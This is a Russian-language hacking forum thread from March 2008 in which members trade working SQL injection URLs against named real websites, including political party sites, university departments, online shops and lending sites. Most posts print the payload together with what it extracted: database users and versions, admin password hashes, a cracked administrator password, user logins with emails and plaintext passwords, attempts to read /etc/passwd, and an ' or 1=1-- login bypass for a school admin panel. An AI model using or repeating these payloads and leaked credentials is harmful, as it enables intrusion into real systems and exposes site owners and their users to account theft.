SQL Инъекции

none222 · 12 Mar 2008

xakep.ru
http://www.xakep.ru/articles/Links/result.asp?tosearch=1=1)+and+(1=1

Kakoytoxaker · 12 Mar 2008

l1ght said:
жопс)
Code:
[B][SIZE=2]http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.tables/*&content_id=1[/SIZE][/B]
Click to expand...
Я вообще-то аполитичен ,но всё должно быть по чесному:

_http://www.yavlinsky.ru/news/index.phtml?id=3520+AND+(version()+like+char(51,46,50,51,46,53,52))

версия 3.23.54
уязвим так-же поиск

Извращаться сильно не стал,но никто не скажет ,что ачат против ЛДПР

ЛифчиС5СВ · 12 Mar 2008

Плаватели Онтарио =)
www.swimontario.com
Code:
http://www.swimontario.com/news.php?id=15+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),user
(),version(),database())/*
1. swimont_cardoso@localhost:
2. 4.1.22-standard:
3. swimont_db

Не смог больше ничего подобрать... хнык =(

vp$ · 12 Mar 2008

www.stroyprice.com PR4;ТИЦ950
Code:
http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0x3a,admin_fullname,admin_pw,admin_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+phpads_config+limit+0,1/*
Administrator:5ebe2294ecd0e0f08eab7690d2a6ee69:[email protected] пасс secret

ну еще 3к юзеров с открытыми паролями
Code:
http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0x3a,usr_name,usr_mail,usr_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+str_tbl_usr+limit+0,1/*
kolya:[email protected]:Lord21

KPOT_f!nd · 13 Mar 2008

Code:

http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+cast(id+as+nvarchar)%2B%27%3A%27%2Bcast(FName+as+nvarchar)%2B%27%3A%27%2Bcast(MName+as+nvarchar)%2B%27%3A%27%2Bcast(LName+as+nvarchar)%2B%27%3A%27%2Bcast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(StreetAddress+as+nvarchar)%2B%27%3A%27%2Bcast(City+as+nvarchar)%2B%27%3A%27%2Bcast(State+as+nvarchar)%2B%27%3A%27%2Bcast(Zip+as+nvarchar)%2B%27%3A%27%2Bcast(HomePhone+as+nvarchar)%2B%27%3A%27%2Bcast(WorkPhone+as+nvarchar)%2B%27%3A%27%2Bcast(Cell+as+nvarchar)%2B%27%3A%27%2Bcast(Pager+as+nvarchar)%2B%27%3A%27%2Bcast(Fax+as+nvarchar)%2B%27%3A%27%2Bcast(UserName+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(DateEntered+as+nvarchar)%2B%27%3A%27%2Bcast(DateModified+as+nvarchar)+from+Staff)--

Code:

http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Coupons','Categories','deal','Deals','dtproperties','News','Oshkosh_west','Retailers','Staff','sysconstraints','syssegments','t_jiaozhu'))--

+ в админке ' or 1=1--

heks · 13 Mar 2008

http://www.itelltd.kiev.ua/index.php?page=equipment&id=111&man_id=0x27%20union+select+1,LOAD_FILE(0x2f6574632f706173737764),LOAD_FILE(0x2f6574632f706173737764),4,5,6,7,8,9+from+news/*

ни чего не получается ни кто не скажет ПОЧЕМУ?

krypt3r · 13 Mar 2008

Ну раз не работает Load_file, то логично предположить, что нет соответствующих прав, не так ли?

cash$$$ · 13 Mar 2008

http://hardmoney.pro/lending/lending.php?ID=99999+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12,13,14,15,16/*
Click to expand...

VERSEON: 4.1.21-community-nt
USER: [email protected]
DATABASE: ksifunding

http://www.global-money.com/item.php?id=99999'+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Click to expand...

VERSEON: 4.0.26
USER: [email protected]
DATABASE: global_money_com_dev

Велемир · 13 Mar 2008

http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+user*

Лень подбирать вапще(. Когда пытаюсь выполнить запрос
http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*, то пишет мол в запросе другое количество столбцов:РР. или я отупел от столь длительного бездействия, или...или... пора на покой:Р.Встречал на многих сайтах и не раз входил в столько своеобразный тупняк =___=

Ershik · 13 Mar 2008

Движок Интернет магазина
http://www.vcam.ru/index.php?id=-1+union+select+user()/*
user: vcam_vcam@localhost
version : 4.1.22-standard
database : vcam_shop

http://www.combox.ru/index.php?id=3+union+select+1,2/*
user : combox_combox@localhost
database : combox_site
version : 4.1.22-standard

Это кстати, главная страница хостинга, и разработчика магазина. Как видите, уязвимость здесь тоже есть

http://www.ventorg.ru/divisions.php?id=-1+union+select+1,2,3,4/*
user : ventorg_torg@localhost
database : ventorg_shop
version : 4.1.22-standard

CaNNabi$ · 13 Mar 2008

http://www.vcam.ru

http://www.ventorg.ru

Боян, блин создали и обновили же АНТИБОЯН вот ТУТ

Dr.Z3r0 · 14 Mar 2008

Так вот вообщем скину вам скули что насоберал в едушках. Собственно это те едухи что не смог похенкать либо впадлу брутить имена таблиц во всех 4ых ветках.

apps.sais-jhu.edu

Code:

http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-67 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
saisforu_gjbarru@localhost : 4.1.22-standard : saisforu_faculty

biomedical.rutgers.edu

Code:

http://biomedical.rutgers.edu/faculty.php?id=-7 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
[email protected] : 4.1.21 : bme

blogsforlearning.msu.edu

Code:

http://blogsforlearning.msu.edu/articles/view.php?id=-7 UNION SELECT 1,2,3,UNHEX(HEX(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()))),5,6,7,8,9/*
4.1.13a-log : [email protected] : blogsforlearning

dma.ucla.edu

Code:

http://dma.ucla.edu/people/faculty.php?ID=-9%20UNION%20SELECT%201,2,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
[email protected] : 4.1.20 : dma

duckhenge.uoregon.edu

Code:

http://duckhenge.uoregon.edu/io/article.php?id=-766 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.32-Debian_7etch1-log : io@localhost : io

experts.uchicago.edu

Code:

http://experts.uchicago.edu/experts.php?id=-174 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A,USER(),VERSION(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
www@localhost :4.0.24-standard :newsoffice
FILE_PRIV=Y

journalism.berkeley.edu

Code:

http://journalism.berkeley.edu/events/details.php?ID=371 UNION SELECT 1,2,3,4,5,6,7,8,9,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
4.1.22 : jschool@localhost : events

llk.media.mit.edu

Code:

http://llk.media.mit.edu/projects.php?id=-783 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),6,7,8/*
4.1.20 : [email protected] : llk

newmedia.cdws.ucf.edu

Code:

http://newmedia.cdws.ucf.edu/pressBoxArticle.php?id=15' AND 1=0 UNION SELECT 1,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),3,4,5/*
newmediawww@localhost : 5.0.24a-community-nt : newmediawww
PS там wordpress но там хрень какаято

qt.exploratorium.edu

Code:

http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-287 UNION SELECT UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE())))/*
[email protected] : 4.1.15-log : resource_centers

urology.jhu.edu

Code:

http://urology.jhu.edu/about/faculty.php?id=59' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.20 : users@localhost : WEB

www.agi.harvard.edu

Code:

http://www.agi.harvard.edu/events/download.php?id=-94 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.20-log : [email protected] : agi

www.choices.edu

Code:

http://www.choices.edu/resources/detail.php?id=-26 UNION SELECT 1,UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
[email protected] : 4.1.14-log : Choices

www.ee.virginia.edu

Code:

http://www.ee.virginia.edu/profile.php?ID=-8 union select 1,2,3,4,5,6,7,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),9,10,11,12,13,14,15,16,17,18,19,20,21/*
php@localhost : 4.1.20 : ECEWeb

www.eng.wayne.edu

Code:

http://www.eng.wayne.edu/page.php?id=-1505 UNION SELECT 1,2,3,4,5,6,7,8,UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()))),10,11,12/*
coeweb@localhost : 4.1.13-standard-log : coeweb
FILE_PRIV=Y

www.psych.ucla.edu

Code:

http://www.psych.ucla.edu/Faculty/faculty.php?area=3&id=47 AND 1=0 UNION SELECT 1,2,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
[email protected] : 4.0.15 : psychadmin

Ну и для супер извращенцев 3 ветки мускуля:

Code:

http://wagner.nyu.edu/news/newsStory.php?id=525 AND 3=SUBSTRING(VERSION(),1,1)/*
http://ux.brookdalecc.edu/content.php?ID=114 AND 3=SUBSTRING(VERSION(),1,1)/*
http://bti.cornell.edu/pgrp/pgrp.php?id=602' AND 3=SUBSTRING(VERSION(),1,1)/*

t0ox · 14 Mar 2008

Сайты с хорошим ПР

http://www.signs.pl/article.php?sid=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+users/*
PR: 5
5.1.19-beta
Click to expand...

Эх, тоже когдато на сеате ездил

http://www.seat.gr/news/news.php?id=-1+UNION+SELECT+1,version(),3,4,5/*
PR: 6
4.0.27
Click to expand...

http://www.krosno24.pl/informacje.php3?id=-1+union+select+1,2,3,4,5,6,version(),8,9/*
PR: 4
4.0.26
Click to expand...

http://www.rtp.org/main/index.php?pid=-1+UNION+SELECT+1,2,version()/*
PR: 6
5.0.22
Click to expand...

http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,version(),3,4/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,password,login,4+from+users/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,concat(login,char(58),password),3,4+from+users/*
PR: 3
4.1.21-log
Click to expand...

http://www.ochenk.com/entry.php?id=-1+union+select+1,2,3,version()/*
PR: 6
4.1.22-standard
Click to expand...

Kakoytoxaker · 14 Mar 2008

2 Sleep

ВСЕ БОЯНЫ и не по одному разу!!!!!!

eutrainingsite.com

_http://forum.antichat.ru/showpost.php?p=577638&postcount=4681
_http://forum.antichat.ru/showpost.php?p=433407&postcount=2863

kino.ru

_http://forum.antichat.ru/showpost.php?p=572859&postcount=4635
_http://forum.antichat.ru/printthread.php?t=21336&page=116&pp=40
_http://forum.antichat.ru/showpost.php?p=315548&postcount=1216

eipcprograms.com

_http://forum.antichat.ru/showpost.php?p=616782&postcount=5131 -2 страницы назад
_http://forum.antichat.ru/showpost.php?p=594249&postcount=981

Блин какой смысл в антибояне?????
Зачем текст в первом посте???
Это конечно не моё дело,но давайте уважать друг друга в ветке и так >500 страниц

t0ox · 15 Mar 2008

http://www.maxkids.pl/?id_p=0+UNION+SELECT+1,2,3,4,5,6,7,8/*
http://www.maxkids.pl/?id_p=0+UNION+SELECT+version(),2,3,4,5,6,7,8/*
http://www.maxkids.pl/?id_p=0+UNION+SELECT+login,2,3,4,5,6,pass,8+from+user/*
PR: 4
4.0.22
Click to expand...

http://www.badorgood.com/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
PR: 5
5.0.45-community-log
Click to expand...

Германия Авто - официальный дилер Volkswagen (Фольксваген) в Рязани

http://www.germania-auto.ru/cars/?type=0&id=-1+union+select+1,version(),3,4,5,6,7/*
5.0.24-standard
Click to expand...

http://www.eifeltour.de/index.php?type=subitem&item=uebernachtung&id=-1+union+select+version(),2/*
PR: 4
5.0.26
Click to expand...

FraiDex · 15 Mar 2008

Сайт какой то школы
http://www.cvsd.org/admin

в поле username: вводим
Code:
1' or 1=1--
и попадаем в админку

ЗЫ я думал эта бага уже в прошлом...

фаг.. уже прикрыли.

Sleep · 15 Mar 2008

Сорри,Сории,Сорри

Code:

http://www.columnists.com/index.php?ID=-11+union+select+1,2,3,4,5,6,table_name,8+from+information_schema.tables/*

Code:

http://www.eipcscreensavers.com/product.php?id=-11+union+select+1,version(),user(),4,5,6,7,database(),9,0,1,2,3/*

Code:

http://www.yogacenter.ru/page.php?id=-11+union+select+table_name,2,3,4,5+from+information_schema.tables/*

Code:

http://www.poweringmuscles.com/sports_science.php?id=-11+union+select+version()/*

Code:

http://jazz.koktebel.info/participant.php?id=-11'+union+select+1,2,3,4,5,6,version(),user()/*

neon_fx · 15 Mar 2008

всем привет
http://www.goldsys.com/index.php?load=content&page_id=-23+union+select+1,2,user(),version(),database(),6,7/*
gold@localhost
goldDB
4.1.20

ReVOLVeR · 15 Mar 2008

_http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "2008 and 1=1--"]'

/CourseStructure.asp, line 2025
2008 and 1=1-- ON-LINE HANDBOOK

ThreeD · 15 Mar 2008

http://www.brightstar.com.tw/product_info_e.php?UID=-772'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3A3a,name,pwd),20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+admin/*

�B��::*FEEF1A11AAEC0B57C55019116A56ACFA47B28417
�� ::*0DCC24D4F0A18E3B84417DC07EB08AEF1BE008E2

SQL Инъекции

none222 Guest

Kakoytoxaker Elder - Старейшина

ЛифчиС5СВ Elder - Старейшина

vp$ Elder - Старейшина

KPOT_f!nd положенец общага

heks Banned

krypt3r Elder - Старейшина

cash$$$ Banned

Велемир Banned

Ershik Elder - Старейшина

CaNNabi$ Elder - Старейшина

Dr.Z3r0 Leaders of the World

t0ox Member

Kakoytoxaker Elder - Старейшина

t0ox Member

FraiDex Elder - Старейшина

Sleep Elder - Старейшина

neon_fx Elder - Старейшина

ReVOLVeR Banned

ThreeD Banned

Useful Searches

SQL Инъекции

none222 Guest

Kakoytoxaker Elder - Старейшина

ЛифчиС5СВ Elder - Старейшина

vp$ Elder - Старейшина

KPOT_f!nd положенец общага

heks Banned

krypt3r Elder - Старейшина

cash$$$ Banned

Велемир Banned

Ershik Elder - Старейшина

CaNNabi$ Elder - Старейшина

Dr.Z3r0 Leaders of the World

t0ox Member

Kakoytoxaker Elder - Старейшина

t0ox Member

FraiDex Elder - Старейшина

Sleep Elder - Старейшина

neon_fx Elder - Старейшина

ReVOLVeR Banned

ThreeD Banned